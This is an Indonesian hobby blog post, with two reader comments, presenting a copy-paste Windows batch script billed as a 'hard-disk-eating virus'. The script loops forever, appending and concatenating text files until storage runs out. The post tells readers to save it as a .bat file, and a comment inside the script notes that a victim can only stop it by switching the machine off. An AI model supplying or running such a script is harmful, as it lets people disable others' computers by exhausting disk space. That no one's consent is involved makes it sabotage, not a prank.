Blog e arek Mblitar..
ISLAM CORNER | HANDPHONE | WINDOWS TRICK | SEO | SOFTWARE | VIRUS | ISENG | CBOX TRICK | CSS TUTORIAL | HACKING | BLOGGING TIPS | INTERNET | HTML TUTORIAL |

Virus Pemakan Hardisk

Kalau dari judulnya aja udah ketauan kita bakalan ngapain. Mungkin terlalu serem tapi percaya kita bisa menghabiskan kapasitas Hard Drive dengan singkat. Kok bisa ya? Yups dalam 7 detik aja file yang akan dibuat bisa mencapai 12MB. Gimana, sekarang baru percaya kan!  Langsung aja kita bikin nih program.




Langsung aja copast script dibawah ini :

@echo off
:1
echo Set Checkpoint.
:2
echo Starting...
rem start COPY.bat - Enabling this stops alot of the Copying, but makes it harder to close. They can always turn the machine off.
echo aaaaaaa >> a.txt
echo bbbbbbb >> b.txt
echo TheFailStartsHere >> TheFail.txt
copy /b a.txt + b.txt TheFail.txt
copy /b TheFail.txt + b.txt a.txt
copy /b TheFail.txt + a.txt b.txt
goto 2
echo If they see this it is a fail.



Simpan dengan ekstensi .bat
Jangan digunakan untuk yang gag bener y0ww :P..

Selamat Mencoba ...!!!

2 comments:

home Stay said...

bikinnya dimana?
notepad juga?

deevro said...

ea boss,,,
jgn lupa save nya pake' yg all files...ok..
haha,,
thnkz knjungannya,,

TULIS KOMENTAR ANDA..!!

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Powered by Blogger